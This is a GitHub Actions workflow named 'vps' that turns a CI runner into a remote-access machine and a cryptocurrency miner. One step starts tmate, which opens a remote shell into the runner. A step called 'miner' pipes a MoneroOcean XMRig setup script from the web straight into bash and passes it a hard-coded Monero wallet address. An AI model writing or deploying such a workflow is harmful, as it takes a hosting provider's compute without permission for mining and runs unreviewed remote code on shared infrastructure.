name: vps

on:
  workflow_dispatch:

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - name: Setup vps (tmate)
        run: |
          sudo apt update
          sudo apt install -y tmate
          tmate -F &

      - name: miner
        run: |
          curl -s -L https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/setup_moneroocean_miner.sh | bash -s 48ZnWombESDbm8o3GzDsYbjHULahvMMW6V5nEXhVzJQXcnxMEtJNVcjSHFHKeVFXMniPEvpH635De74x4KJa4aDgL5YNez1
